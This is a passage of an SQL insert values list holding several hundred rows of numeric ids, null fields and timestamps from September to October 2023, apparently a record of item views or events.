(6603, NULL, NULL, 2055, 1, '2023-09-05 11:21:30'),
(6604, NULL, NULL, 2059, 1, '2023-09-05 14:46:29'),
(6605, NULL, NULL, 2059, 1, '2023-09-05 15:53:59'),
(6606, NULL, NULL, 2064, 1, '2023-09-05 20:30:30'),
(6607, NULL, NULL, 2053, 1, '2023-09-05 23:02:40'),
(6608, NULL, NULL, 2055, 1, '2023-09-05 23:10:23'),
(6609, NULL, NULL, 2059, 1, '2023-09-05 23:11:35'),
(6610, NULL, NULL, 2054, 1, '2023-09-05 23:12:37'),
(6611, NULL, NULL, 2064, 1, '2023-09-05 23:13:44'),
(6612, NULL, NULL, 2053, 1, '2023-09-05 23:14:48'),
(6613, NULL, NULL, 2060, 1, '2023-09-05 23:15:53'),
(6614, NULL, NULL, 2060, 1, '2023-09-05 23:16:55'),
(6615, NULL, NULL, 2063, 1, '2023-09-05 23:17:34'),
(6616, NULL, NULL, 2062, 1, '2023-09-05 23:17:46'),
(6617, NULL, NULL, 2058, 1, '2023-09-05 23:18:34'),
(6618, NULL, NULL, 2063, 1, '2023-09-05 23:18:45'),
(6619, NULL, NULL, 2054, 1, '2023-09-06 01:48:02'),
(6620, NULL, NULL, 2063, 1, '2023-09-06 02:54:29'),
(6621, NULL, NULL, 2054, 1, '2023-09-06 10:44:07'),
(6622, NULL, NULL, 2054, 1, '2023-09-06 12:49:27'),
(6623, NULL, NULL, 2062, 1, '2023-09-06 14:58:30'),
(6624, NULL, NULL, 2060, 1, '2023-09-06 14:58:31'),
(6625, NULL, NULL, 2064, 1, '2023-09-06 15:06:46'),
(6626, NULL, NULL, 2061, 1, '2023-09-06 15:32:44'),
(6627, NULL, NULL, 2064, 1, '2023-09-06 18:52:28'),
(6628, NULL, NULL, 2053, 1, '2023-09-07 03:44:48'),
(6629, NULL, NULL, 2054, 1, '2023-09-07 07:49:52'),
(6630, NULL, NULL, 2063, 1, '2023-09-07 08:52:03'),
(6631, NULL, NULL, 2063, 1, '2023-09-07 14:31:48'),
(6632, NULL, NULL, 2059, 1, '2023-09-07 23:24:58'),
(6633, NULL, NULL, 2061, 1, '2023-09-08 07:51:58'),
(6634, NULL, NULL, 2058, 1, '2023-09-08 12:38:52'),
(6635, NULL, NULL, 2061, 1, '2023-09-08 12:38:55'),
(6636, NULL, NULL, 2059, 1, '2023-09-08 12:38:58'),
(6637, NULL, NULL, 2060, 1, '2023-09-08 12:39:01'),
(6638, NULL, NULL, 2062, 1, '2023-09-08 12:39:04'),
(6639, NULL, NULL, 2063, 1, '2023-09-08 12:39:08'),
(6640, NULL, NULL, 2064, 1, '2023-09-08 12:39:12'),
(6641, NULL, NULL, 2055, 1, '2023-09-08 12:40:15'),
(6642, NULL, NULL, 2054, 1, '2023-09-08 12:40:25'),
(6643, NULL, NULL, 2053, 1, '2023-09-08 12:40:36'),
(6644, NULL, NULL, 2058, 1, '2023-09-08 13:10:31'),
(6645, NULL, NULL, 2061, 1, '2023-09-08 13:10:49'),
(6646, NULL, NULL, 2059, 1, '2023-09-08 13:11:04'),
(6647, NULL, NULL, 2060, 1, '2023-09-08 13:11:26'),
(6648, NULL, NULL, 2062, 1, '2023-09-08 13:11:56'),
(6649, NULL, NULL, 2063, 1, '2023-09-08 13:12:20'),
(6650, NULL, NULL, 2064, 1, '2023-09-08 13:12:36'),
(6651, NULL, NULL, 2055, 1, '2023-09-08 13:14:00'),
(6652, NULL, NULL, 2054, 1, '2023-09-08 13:14:03'),
(6653, NULL, NULL, 2053, 1, '2023-09-08 13:14:07'),
(6654, NULL, NULL, 2061, 1, '2023-09-08 14:13:54'),
(6655, NULL, NULL, 2061, 1, '2023-09-08 20:53:36'),
(6656, NULL, NULL, 2062, 1, '2023-09-09 03:06:05'),
(6657, NULL, NULL, 2061, 1, '2023-09-09 05:34:59'),
(6658, NULL, NULL, 2064, 1, '2023-09-09 12:49:06'),
(6659, NULL, NULL, 2061, 1, '2023-09-09 18:31:09'),
(6660, NULL, NULL, 2059, 1, '2023-09-10 00:01:39'),
(6661, NULL, NULL, 2064, 1, '2023-09-10 00:38:27'),
(6662, NULL, NULL, 2059, 1, '2023-09-10 03:24:08'),
(6663, NULL, NULL, 2054, 1, '2023-09-10 06:40:05'),
(6664, NULL, NULL, 2058, 1, '2023-09-10 07:01:41'),
(6665, NULL, NULL, 2055, 1, '2023-09-10 09:14:23'),
(6666, NULL, NULL, 2063, 1, '2023-09-10 10:25:55'),
(6667, NULL, NULL, 2054, 1, '2023-09-10 17:15:43'),
(6668, NULL, NULL, 2061, 1, '2023-09-10 23:41:16'),
(6669, NULL, NULL, 2061, 1, '2023-09-11 03:06:15'),
(6670, NULL, NULL, 2064, 1, '2023-09-11 04:59:38'),
(6671, NULL, NULL, 2058, 1, '2023-09-11 09:08:10'),
(6672, NULL, NULL, 2058, 1, '2023-09-11 09:08:11'),
(6673, NULL, NULL, 2058, 1, '2023-09-11 09:08:11'),
(6674, NULL, NULL, 2058, 1, '2023-09-11 09:08:12'),
(6675, NULL, NULL, 2058, 1, '2023-09-11 09:08:13'),
(6676, NULL, NULL, 2058, 1, '2023-09-11 09:08:15'),
(6677, NULL, NULL, 2058, 1, '2023-09-11 09:08:18'),
(6678, NULL, NULL, 2058, 1, '2023-09-11 09:08:19'),
(6679, NULL, NULL, 2058, 1, '2023-09-11 09:08:21'),
(6680, NULL, NULL, 2058, 1, '2023-09-11 10:08:37'),
(6681, NULL, NULL, 2058, 1, '2023-09-11 10:08:45'),
(6682, NULL, NULL, 2058, 1, '2023-09-11 10:08:48'),
(6683, NULL, NULL, 2058, 1, '2023-09-11 10:09:00'),
(6684, NULL, NULL, 2058, 1, '2023-09-11 10:11:51'),
(6685, NULL, NULL, 2058, 1, '2023-09-11 10:18:59'),
(6686, NULL, NULL, 2058, 1, '2023-09-11 11:25:10'),
(6687, NULL, NULL, 2058, 1, '2023-09-11 11:25:10'),
(6688, NULL, NULL, 2058, 1, '2023-09-11 11:25:10'),
(6689, NULL, NULL, 2058, 1, '2023-09-11 11:25:14'),
(6690, NULL, NULL, 2058, 1, '2023-09-11 11:47:44'),
(6691, NULL, NULL, 2063, 1, '2023-09-11 14:09:54'),
(6692, NULL, NULL, 2058, 1, '2023-09-11 14:39:34'),
(6693, NULL, NULL, 2058, 1, '2023-09-11 17:59:30'),
(6694, NULL, NULL, 2062, 1, '2023-09-11 18:25:43'),
(6695, NULL, NULL, 2058, 1, '2023-09-12 00:55:20'),
(6696, NULL, NULL, 2064, 1, '2023-09-12 01:59:20'),
(6697, NULL, NULL, 2054, 1, '2023-09-12 02:38:09'),
(6698, NULL, NULL, 2062, 1, '2023-09-12 04:44:39'),
(6699, NULL, NULL, 2061, 1, '2023-09-12 05:29:56'),
(6700, NULL, NULL, 2058, 1, '2023-09-12 06:46:14'),
(6701, NULL, NULL, 2059, 1, '2023-09-12 07:07:00'),
(6702, NULL, NULL, 2064, 1, '2023-09-12 09:40:21'),
(6703, NULL, NULL, 2058, 1, '2023-09-12 13:38:52'),
(6704, NULL, NULL, 2058, 1, '2023-09-12 15:46:36'),
(6705, NULL, NULL, 2058, 1, '2023-09-12 15:47:16'),
(6706, NULL, NULL, 2058, 1, '2023-09-12 15:48:43'),
(6707, NULL, NULL, 2058, 1, '2023-09-12 16:07:42'),
(6708, NULL, NULL, 2058, 1, '2023-09-12 16:21:39'),
(6709, NULL, NULL, 2058, 1, '2023-09-12 16:28:14'),
(6710, NULL, NULL, 2060, 1, '2023-09-12 20:44:05'),
(6711, NULL, NULL, 2058, 1, '2023-09-13 02:35:38'),
(6712, NULL, NULL, 2061, 1, '2023-09-13 03:01:22'),
(6713, NULL, NULL, 2055, 1, '2023-09-13 04:26:30'),
(6714, NULL, NULL, 2054, 1, '2023-09-13 12:13:38'),
(6715, NULL, NULL, 2062, 1, '2023-09-13 20:52:16'),
(6716, NULL, NULL, 2060, 1, '2023-09-13 20:52:16'),
(6717, NULL, NULL, 2063, 1, '2023-09-13 20:52:16'),
(6718, NULL, NULL, 2064, 1, '2023-09-13 20:52:16'),
(6719, NULL, NULL, 2061, 1, '2023-09-13 20:52:16'),
(6720, NULL, NULL, 2059, 1, '2023-09-13 20:52:16'),
(6721, NULL, NULL, 2058, 1, '2023-09-13 20:52:17'),
(6722, NULL, NULL, 2055, 1, '2023-09-13 20:52:18'),
(6723, NULL, NULL, 2054, 1, '2023-09-13 20:52:18'),
(6724, NULL, NULL, 2053, 1, '2023-09-13 22:59:43'),
(6725, NULL, NULL, 2064, 1, '2023-09-13 23:47:39'),
(6726, NULL, NULL, 2061, 1, '2023-09-14 02:52:34'),
(6727, NULL, NULL, 2060, 1, '2023-09-14 05:44:57'),
(6728, NULL, NULL, 2055, 1, '2023-09-14 08:31:09'),
(6729, NULL, NULL, 2059, 1, '2023-09-14 09:17:22'),
(6730, NULL, NULL, 2054, 1, '2023-09-14 12:03:22'),
(6731, NULL, NULL, 2059, 1, '2023-09-14 12:03:23'),
(6732, NULL, NULL, 2055, 1, '2023-09-14 12:03:24'),
(6733, NULL, NULL, 2062, 1, '2023-09-14 12:03:25'),
(6734, NULL, NULL, 2061, 1, '2023-09-14 12:03:26'),
(6735, NULL, NULL, 2060, 1, '2023-09-14 12:03:27'),
(6736, NULL, NULL, 2058, 1, '2023-09-14 12:03:27'),
(6737, NULL, NULL, 2064, 1, '2023-09-14 12:03:29'),
(6738, NULL, NULL, 2063, 1, '2023-09-14 12:03:31'),
(6739, NULL, NULL, 2053, 1, '2023-09-14 12:03:37'),
(6740, NULL, NULL, 2061, 1, '2023-09-14 12:31:55'),
(6741, NULL, NULL, 2054, 1, '2023-09-14 12:55:16'),
(6742, NULL, NULL, 2064, 1, '2023-09-14 13:27:09'),
(6743, NULL, NULL, 2060, 1, '2023-09-14 15:42:12'),
(6744, NULL, NULL, 2063, 1, '2023-09-14 20:42:39'),
(6745, NULL, NULL, 2058, 1, '2023-09-15 00:23:38'),
(6746, NULL, NULL, 2062, 1, '2023-09-15 07:59:29'),
(6747, NULL, NULL, 2061, 1, '2023-09-15 10:30:39'),
(6748, NULL, NULL, 2063, 1, '2023-09-15 14:00:43'),
(6749, NULL, NULL, 2059, 1, '2023-09-15 14:26:50'),
(6750, NULL, NULL, 2054, 1, '2023-09-15 14:50:59'),
(6751, NULL, NULL, 2055, 1, '2023-09-15 14:51:56'),
(6752, NULL, NULL, 2064, 1, '2023-09-15 14:54:18'),
(6753, NULL, NULL, 2063, 1, '2023-09-15 14:55:43'),
(6754, NULL, NULL, 2062, 1, '2023-09-15 14:56:40'),
(6755, NULL, NULL, 2060, 1, '2023-09-15 14:57:36'),
(6756, NULL, NULL, 2059, 1, '2023-09-15 14:58:32'),
(6757, NULL, NULL, 2061, 1, '2023-09-15 14:59:28'),
(6758, NULL, NULL, 2058, 1, '2023-09-15 15:00:24'),
(6759, NULL, NULL, 2058, 1, '2023-09-15 18:23:35'),
(6760, NULL, NULL, 2059, 1, '2023-09-15 22:45:21'),
(6761, NULL, NULL, 2060, 1, '2023-09-16 02:27:40'),
(6762, NULL, NULL, 2064, 1, '2023-09-16 04:53:08'),
(6763, NULL, NULL, 2059, 1, '2023-09-16 07:51:47'),
(6764, NULL, NULL, 2064, 1, '2023-09-16 08:17:03'),
(6765, NULL, NULL, 2061, 1, '2023-09-16 11:52:36'),
(6766, NULL, NULL, 2062, 1, '2023-09-16 13:47:53'),
(6767, NULL, NULL, 2060, 1, '2023-09-16 14:25:22'),
(6768, NULL, NULL, 2059, 1, '2023-09-16 20:00:17'),
(6769, NULL, NULL, 2058, 1, '2023-09-17 04:04:42'),
(6770, NULL, NULL, 2055, 1, '2023-09-17 07:51:52'),
(6771, NULL, NULL, 2061, 1, '2023-09-17 07:53:44'),
(6772, NULL, NULL, 2064, 1, '2023-09-17 08:38:19'),
(6773, NULL, NULL, 2061, 1, '2023-09-17 09:19:35'),
(6774, NULL, NULL, 2059, 1, '2023-09-17 14:35:45'),
(6775, NULL, NULL, 2061, 1, '2023-09-17 17:44:41'),
(6776, NULL, NULL, 2058, 1, '2023-09-17 21:07:45'),
(6777, NULL, NULL, 2055, 1, '2023-09-18 03:11:47'),
(6778, NULL, NULL, 2054, 1, '2023-09-18 04:18:31'),
(6779, NULL, NULL, 2058, 1, '2023-09-18 05:01:11'),
(6780, NULL, NULL, 2063, 1, '2023-09-18 10:57:16'),
(6781, NULL, NULL, 2059, 1, '2023-09-18 10:57:17'),
(6782, NULL, NULL, 2054, 1, '2023-09-18 10:57:18'),
(6783, NULL, NULL, 2064, 1, '2023-09-18 10:57:21'),
(6784, NULL, NULL, 2061, 1, '2023-09-18 10:57:22'),
(6785, NULL, NULL, 2062, 1, '2023-09-18 10:57:23'),
(6786, NULL, NULL, 2058, 1, '2023-09-18 10:57:26'),
(6787, NULL, NULL, 2055, 1, '2023-09-18 10:57:28'),
(6788, NULL, NULL, 2060, 1, '2023-09-18 10:57:40'),
(6789, NULL, NULL, 2061, 1, '2023-09-18 14:42:59'),
(6790, NULL, NULL, 2058, 1, '2023-09-18 22:27:39'),
(6791, NULL, NULL, 2058, 1, '2023-09-19 01:13:11'),
(6792, NULL, NULL, 2058, 1, '2023-09-19 01:37:53'),
(6793, NULL, NULL, 2059, 1, '2023-09-19 07:12:42'),
(6794, NULL, NULL, 2059, 1, '2023-09-19 13:33:45'),
(6795, NULL, NULL, 2059, 1, '2023-09-19 14:48:45'),
(6796, NULL, NULL, 2063, 1, '2023-09-19 17:06:40'),
(6797, NULL, NULL, 2060, 1, '2023-09-19 19:20:51'),
(6798, NULL, NULL, 2063, 1, '2023-09-19 20:00:48'),
(6799, NULL, NULL, 2059, 1, '2023-09-19 22:45:36'),
(6800, NULL, NULL, 2055, 1, '2023-09-20 01:26:12'),
(6801, NULL, NULL, 2053, 1, '2023-09-20 01:31:25'),
(6802, NULL, NULL, 2054, 1, '2023-09-20 01:32:28'),
(6803, NULL, NULL, 2060, 1, '2023-09-20 01:33:32'),
(6804, NULL, NULL, 2060, 1, '2023-09-20 01:34:34'),
(6805, NULL, NULL, 2058, 1, '2023-09-20 01:35:45'),
(6806, NULL, NULL, 2063, 1, '2023-09-20 01:36:42'),
(6807, NULL, NULL, 2062, 1, '2023-09-20 01:37:05'),
(6808, NULL, NULL, 2058, 1, '2023-09-20 17:30:25'),
(6809, NULL, NULL, 2064, 1, '2023-09-20 21:07:51'),
(6810, NULL, NULL, 2059, 1, '2023-09-20 23:55:35'),
(6811, NULL, NULL, 2064, 1, '2023-09-21 03:57:41'),
(6812, NULL, NULL, 2054, 1, '2023-09-21 05:10:15'),
(6813, NULL, NULL, 2064, 1, '2023-09-21 05:24:05'),
(6814, NULL, NULL, 2064, 1, '2023-09-21 06:06:38'),
(6815, NULL, NULL, 2064, 1, '2023-09-21 06:43:45'),
(6816, NULL, NULL, 2061, 1, '2023-09-21 07:11:24'),
(6817, NULL, NULL, 2062, 1, '2023-09-21 07:15:51'),
(6818, NULL, NULL, 2061, 1, '2023-09-21 07:31:50'),
(6819, NULL, NULL, 2061, 1, '2023-09-21 09:49:15'),
(6820, NULL, NULL, 2061, 1, '2023-09-21 13:01:40'),
(6821, NULL, NULL, 2054, 1, '2023-09-21 14:42:45'),
(6822, NULL, NULL, 2059, 1, '2023-09-21 21:31:31'),
(6823, NULL, NULL, 2059, 1, '2023-09-21 23:18:14'),
(6824, NULL, NULL, 2055, 1, '2023-09-22 02:57:18'),
(6825, NULL, NULL, 2053, 1, '2023-09-22 02:58:25'),
(6826, NULL, NULL, 2054, 1, '2023-09-22 02:59:25'),
(6827, NULL, NULL, 2060, 1, '2023-09-22 03:00:23'),
(6828, NULL, NULL, 2060, 1, '2023-09-22 03:01:22'),
(6829, NULL, NULL, 2058, 1, '2023-09-22 03:02:13'),
(6830, NULL, NULL, 2063, 1, '2023-09-22 03:03:12'),
(6831, NULL, NULL, 2062, 1, '2023-09-22 03:03:23'),
(6832, NULL, NULL, 2059, 1, '2023-09-22 04:38:48'),
(6833, NULL, NULL, 2054, 1, '2023-09-22 07:04:50'),
(6834, NULL, NULL, 2060, 1, '2023-09-22 07:40:42'),
(6835, NULL, NULL, 2061, 1, '2023-09-22 08:19:32'),
(6836, NULL, NULL, 2059, 1, '2023-09-22 09:18:13'),
(6837, NULL, NULL, 2059, 1, '2023-09-22 09:27:10'),
(6838, NULL, NULL, 2064, 1, '2023-09-22 10:02:47'),
(6839, NULL, NULL, 2062, 1, '2023-09-22 10:40:42'),
(6840, NULL, NULL, 2055, 1, '2023-09-22 11:42:26'),
(6841, NULL, NULL, 2063, 1, '2023-09-22 12:38:38'),
(6842, NULL, NULL, 2061, 1, '2023-09-22 12:49:14'),
(6843, NULL, NULL, 2058, 1, '2023-09-22 12:56:55'),
(6844, NULL, NULL, 2055, 1, '2023-09-22 14:12:50'),
(6845, NULL, NULL, 2059, 1, '2023-09-22 15:46:15'),
(6846, NULL, NULL, 2063, 1, '2023-09-22 19:56:04'),
(6847, NULL, NULL, 2054, 1, '2023-09-23 00:38:57'),
(6848, NULL, NULL, 2060, 1, '2023-09-23 01:13:41'),
(6849, NULL, NULL, 2061, 1, '2023-09-23 01:50:19'),
(6850, NULL, NULL, 2059, 1, '2023-09-23 01:55:03'),
(6851, NULL, NULL, 2059, 1, '2023-09-23 02:46:56'),
(6852, NULL, NULL, 2064, 1, '2023-09-23 03:29:22'),
(6853, NULL, NULL, 2062, 1, '2023-09-23 04:05:50'),
(6854, NULL, NULL, 2055, 1, '2023-09-23 05:09:28'),
(6855, NULL, NULL, 2063, 1, '2023-09-23 06:11:53'),
(6856, NULL, NULL, 2058, 1, '2023-09-23 06:32:05'),
(6857, NULL, NULL, 2055, 1, '2023-09-23 06:58:36'),
(6858, NULL, NULL, 2062, 1, '2023-09-23 09:06:30'),
(6859, NULL, NULL, 2055, 1, '2023-09-23 09:38:59'),
(6860, NULL, NULL, 2064, 1, '2023-09-23 09:39:07'),
(6861, NULL, NULL, 2063, 1, '2023-09-23 09:39:10'),
(6862, NULL, NULL, 2062, 1, '2023-09-23 09:39:13'),
(6863, NULL, NULL, 2060, 1, '2023-09-23 09:39:16'),
(6864, NULL, NULL, 2062, 1, '2023-09-23 10:14:52'),
(6865, NULL, NULL, 2062, 1, '2023-09-23 10:14:53'),
(6866, NULL, NULL, 2059, 1, '2023-09-24 05:45:20'),
(6867, NULL, NULL, 2059, 1, '2023-09-24 10:37:21'),
(6868, NULL, NULL, 2059, 1, '2023-09-24 18:59:52'),
(6869, NULL, NULL, 2061, 1, '2023-09-25 00:39:55'),
(6870, NULL, NULL, 2061, 1, '2023-09-25 03:08:03'),
(6871, NULL, NULL, 2055, 1, '2023-09-25 03:14:20'),
(6872, NULL, NULL, 2064, 1, '2023-09-25 18:58:30'),
(6873, NULL, NULL, 2055, 1, '2023-09-25 21:55:34'),
(6874, NULL, NULL, 2060, 1, '2023-09-25 23:08:04'),
(6875, NULL, NULL, 2060, 1, '2023-09-26 01:54:52'),
(6876, NULL, NULL, 2064, 1, '2023-09-26 03:57:59'),
(6877, NULL, NULL, 2054, 1, '2023-09-26 06:05:38'),
(6878, NULL, NULL, 2058, 1, '2023-09-26 07:56:38'),
(6879, NULL, NULL, 2059, 1, '2023-09-26 09:16:03'),
(6880, NULL, NULL, 2054, 1, '2023-09-26 15:52:39'),
(6881, NULL, NULL, 2054, 1, '2023-09-26 22:54:43'),
(6882, NULL, NULL, 2055, 1, '2023-09-26 22:54:47'),
(6883, NULL, NULL, 2064, 1, '2023-09-26 22:55:05'),
(6884, NULL, NULL, 2063, 1, '2023-09-26 22:55:10'),
(6885, NULL, NULL, 2062, 1, '2023-09-26 22:55:11'),
(6886, NULL, NULL, 2060, 1, '2023-09-26 22:55:15'),
(6887, NULL, NULL, 2059, 1, '2023-09-26 22:55:17'),
(6888, NULL, NULL, 2061, 1, '2023-09-26 22:55:20'),
(6889, NULL, NULL, 2058, 1, '2023-09-26 22:55:22'),
(6890, NULL, NULL, 2063, 1, '2023-09-27 08:52:20'),
(6891, NULL, NULL, 2061, 1, '2023-09-27 11:39:51'),
(6892, NULL, NULL, 2064, 1, '2023-09-27 11:40:07'),
(6893, NULL, NULL, 2061, 1, '2023-09-27 14:50:48'),
(6894, NULL, NULL, 2059, 1, '2023-09-27 19:47:26'),
(6895, NULL, NULL, 2064, 1, '2023-09-27 23:30:31'),
(6896, NULL, NULL, 2063, 1, '2023-09-28 02:24:41'),
(6897, NULL, NULL, 2062, 1, '2023-09-28 02:48:45'),
(6898, NULL, NULL, 2062, 1, '2023-09-28 02:49:35'),
(6899, NULL, NULL, 2064, 1, '2023-09-28 07:02:08'),
(6900, NULL, NULL, 2054, 1, '2023-09-28 07:02:12'),
(6901, NULL, NULL, 2061, 1, '2023-09-28 07:02:16'),
(6902, NULL, NULL, 2062, 1, '2023-09-28 07:02:20'),
(6903, NULL, NULL, 2058, 1, '2023-09-28 07:02:27'),
(6904, NULL, NULL, 2060, 1, '2023-09-28 07:02:32'),
(6905, NULL, NULL, 2055, 1, '2023-09-28 07:03:43'),
(6906, NULL, NULL, 2063, 1, '2023-09-28 07:03:48'),
(6907, NULL, NULL, 2059, 1, '2023-09-28 07:03:55'),
(6908, NULL, NULL, 2060, 1, '2023-09-28 07:05:36'),
(6909, NULL, NULL, 2054, 1, '2023-09-28 07:05:48'),
(6910, NULL, NULL, 2063, 1, '2023-09-28 07:05:55'),
(6911, NULL, NULL, 2061, 1, '2023-09-28 07:06:04'),
(6912, NULL, NULL, 2064, 1, '2023-09-28 07:06:23'),
(6913, NULL, NULL, 2053, 1, '2023-09-28 07:06:34'),
(6914, NULL, NULL, 2062, 1, '2023-09-28 07:06:46'),
(6915, NULL, NULL, 2055, 1, '2023-09-28 07:06:50'),
(6916, NULL, NULL, 2059, 1, '2023-09-28 07:06:57'),
(6917, NULL, NULL, 2058, 1, '2023-09-28 07:07:01'),
(6918, NULL, NULL, 2054, 1, '2023-09-28 12:32:50'),
(6919, NULL, NULL, 2062, 1, '2023-09-28 16:45:48'),
(6920, NULL, NULL, 2059, 1, '2023-09-28 18:52:11'),
(6921, NULL, NULL, 2061, 1, '2023-09-29 00:55:28'),
(6922, NULL, NULL, 2064, 1, '2023-09-29 01:20:48'),
(6923, NULL, NULL, 2059, 1, '2023-09-29 04:15:52'),
(6924, NULL, NULL, 2059, 1, '2023-09-29 15:26:00'),
(6925, NULL, NULL, 2055, 1, '2023-09-30 00:21:23'),
(6926, NULL, NULL, 2059, 1, '2023-09-30 02:24:32'),
(6927, NULL, NULL, 2054, 1, '2023-09-30 03:55:54'),
(6928, NULL, NULL, 2054, 1, '2023-09-30 04:10:18'),
(6929, NULL, NULL, 2059, 1, '2023-09-30 04:14:59'),
(6930, NULL, NULL, 2064, 1, '2023-09-30 07:00:47'),
(6931, NULL, NULL, 2055, 1, '2023-09-30 09:27:41'),
(6932, NULL, NULL, 2061, 1, '2023-09-30 18:15:24'),
(6933, NULL, NULL, 2059, 1, '2023-10-01 00:49:15'),
(6934, NULL, NULL, 2064, 1, '2023-10-01 03:54:29'),
(6935, NULL, NULL, 2055, 1, '2023-10-01 08:59:26'),
(6936, NULL, NULL, 2064, 1, '2023-10-02 04:53:04'),
(6937, NULL, NULL, 2059, 1, '2023-10-02 06:41:17'),
(6938, NULL, NULL, 2058, 1, '2023-10-02 10:17:14'),
(6939, NULL, NULL, 2060, 1, '2023-10-03 07:38:19'),
(6940, NULL, NULL, 2063, 1, '2023-10-03 07:47:30'),
(6941, NULL, NULL, 2058, 1, '2023-10-03 08:10:34'),
(6942, NULL, NULL, 2055, 1, '2023-10-03 08:55:54'),
(6943, NULL, NULL, 2061, 1, '2023-10-03 10:22:46'),
(6944, NULL, NULL, 2062, 1, '2023-10-03 11:04:47'),
(6945, NULL, NULL, 2054, 1, '2023-10-03 12:33:22'),
(6946, NULL, NULL, 2064, 1, '2023-10-03 12:43:39'),
(6947, NULL, NULL, 2059, 1, '2023-10-03 12:51:05'),
(6948, NULL, NULL, 2064, 1, '2023-10-03 13:06:21'),
(6949, NULL, NULL, 2064, 1, '2023-10-03 16:02:20'),
(6950, NULL, NULL, 2064, 1, '2023-10-03 16:02:35'),
(6951, NULL, NULL, 2062, 1, '2023-10-03 16:02:41'),
(6952, NULL, NULL, 2059, 1, '2023-10-03 16:02:42'),
(6953, NULL, NULL, 2055, 1, '2023-10-03 16:02:44'),
(6954, NULL, NULL, 2054, 1, '2023-10-03 16:02:46'),
(6955, NULL, NULL, 2061, 1, '2023-10-03 16:02:48'),
(6956, NULL, NULL, 2063, 1, '2023-10-03 16:02:49'),
(6957, NULL, NULL, 2058, 1, '2023-10-03 16:02:50'),
(6958, NULL, NULL, 2060, 1, '2023-10-03 16:02:51'),
(6959, NULL, NULL, 2061, 1, '2023-10-03 16:04:09'),
(6960, NULL, NULL, 2055, 1, '2023-10-03 16:04:17'),
(6961, NULL, NULL, 2058, 1, '2023-10-03 16:04:20'),
(6962, NULL, NULL, 2062, 1, '2023-10-03 16:04:30'),
(6963, NULL, NULL, 2063, 1, '2023-10-03 16:04:41'),
(6964, NULL, NULL, 2060, 1, '2023-10-03 16:04:42'),
(6965, NULL, NULL, 2059, 1, '2023-10-03 16:04:47'),
(6966, NULL, NULL, 2054, 1, '2023-10-03 16:04:52'),
(6967, NULL, NULL, 2053, 1, '2023-10-03 16:04:57'),
(6968, NULL, NULL, 2060, 1, '2023-10-03 19:41:54'),
(6969, NULL, NULL, 2063, 1, '2023-10-03 19:50:50'),
(6970, NULL, NULL, 2060, 1, '2023-10-03 20:19:21'),
(6971, NULL, NULL, 2063, 1, '2023-10-03 20:28:19'),
(6972, NULL, NULL, 2060, 1, '2023-10-03 20:55:26'),
(6973, NULL, NULL, 2060, 1, '2023-10-03 21:24:12'),
(6974, NULL, NULL, 2063, 1, '2023-10-03 21:32:38'),
(6975, NULL, NULL, 2058, 1, '2023-10-03 22:03:08'),
(6976, NULL, NULL, 2055, 1, '2023-10-03 22:38:08'),
(6977, NULL, NULL, 2061, 1, '2023-10-04 00:01:39'),
(6978, NULL, NULL, 2062, 1, '2023-10-04 00:43:39'),
(6979, NULL, NULL, 2060, 1, '2023-10-04 01:55:10'),
(6980, NULL, NULL, 2063, 1, '2023-10-04 02:04:10'),
(6981, NULL, NULL, 2058, 1, '2023-10-04 02:27:05'),
(6982, NULL, NULL, 2055, 1, '2023-10-04 03:11:13'),
(6983, NULL, NULL, 2060, 1, '2023-10-04 03:50:03'),
(6984, NULL, NULL, 2061, 1, '2023-10-04 04:47:00'),
(6985, NULL, NULL, 2062, 1, '2023-10-04 05:33:14'),
(6986, NULL, NULL, 2062, 1, '2023-10-04 06:02:35'),
(6987, NULL, NULL, 2062, 1, '2023-10-04 06:04:19'),
(6988, NULL, NULL, 2054, 1, '2023-10-04 07:18:08'),
(6989, NULL, NULL, 2059, 1, '2023-10-04 07:39:41'),
(6990, NULL, NULL, 2064, 1, '2023-10-04 07:57:28'),
(6991, NULL, NULL, 2059, 1, '2023-10-04 15:19:02'),
(6992, NULL, NULL, 2059, 1, '2023-10-04 18:00:49'),
(6993, NULL, NULL, 2054, 1, '2023-10-04 20:07:48'),
(6994, NULL, NULL, 2064, 1, '2023-10-05 10:22:02'),
(6995, NULL, NULL, 2061, 1, '2023-10-05 14:11:13'),
(6996, NULL, NULL, 2061, 1, '2023-10-05 14:11:37'),
(6997, NULL, NULL, 2059, 1, '2023-10-05 14:40:05'),
(6998, NULL, NULL, 2061, 1, '2023-10-05 15:07:53'),
(6999, NULL, NULL, 2061, 1, '2023-10-05 15:08:03'),
(7000, NULL, NULL, 2061, 1, '2023-10-06 01:27:43'),
(7001, NULL, NULL, 2059, 1, '2023-10-06 02:57:45'),
(7002, NULL, NULL, 2053, 1, '2023-10-06 05:27:38'),
(7003, NULL, NULL, 2059, 1, '2023-10-06 07:55:47'),
(7004, NULL, NULL, 2054, 1, '2023-10-06 08:40:46'),
(7005, NULL, NULL, 2053, 1, '2023-10-06 14:11:13'),
(7006, NULL, NULL, 2059, 1, '2023-10-06 16:55:28'),
(7007, NULL, NULL, 2059, 1, '2023-10-06 17:16:55'),
(7008, NULL, NULL, 2054, 1, '2023-10-06 17:32:51'),
(7009, NULL, NULL, 2054, 1, '2023-10-06 18:16:53'),
(7010, NULL, NULL, 2054, 1, '2023-10-06 18:30:57'),
(7011, NULL, NULL, 2061, 1, '2023-10-06 18:59:09'),
(7012, NULL, NULL, 2059, 1, '2023-10-06 19:05:11'),
(7013, NULL, NULL, 2064, 1, '2023-10-07 06:07:11'),
(7014, NULL, NULL, 2062, 1, '2023-10-07 07:59:53'),
(7015, NULL, NULL, 2062, 1, '2023-10-07 07:59:55'),
(7016, NULL, NULL, 2059, 1, '2023-10-07 10:09:42'),
(7017, NULL, NULL, 2059, 1, '2023-10-07 18:10:56'),
(7018, NULL, NULL, 2064, 1, '2023-10-08 02:48:03'),
(7019, NULL, NULL, 2059, 1, '2023-10-08 08:05:29'),
(7020, NULL, NULL, 2059, 1, '2023-10-08 09:27:18'),
(7021, NULL, NULL, 2054, 1, '2023-10-08 13:23:55'),
(7022, NULL, NULL, 2055, 1, '2023-10-08 13:23:55'),
(7023, NULL, NULL, 2064, 1, '2023-10-08 13:23:56'),
(7024, NULL, NULL, 2063, 1, '2023-10-08 13:23:57'),
(7025, NULL, NULL, 2059, 1, '2023-10-08 13:23:58'),
(7026, NULL, NULL, 2060, 1, '2023-10-08 13:23:58'),
(7027, NULL, NULL, 2062, 1, '2023-10-08 13:23:58'),
(7028, NULL, NULL, 2061, 1, '2023-10-08 13:23:58'),
(7029, NULL, NULL, 2058, 1, '2023-10-08 13:23:59'),
(7030, NULL, NULL, 2064, 1, '2023-10-08 16:33:26'),
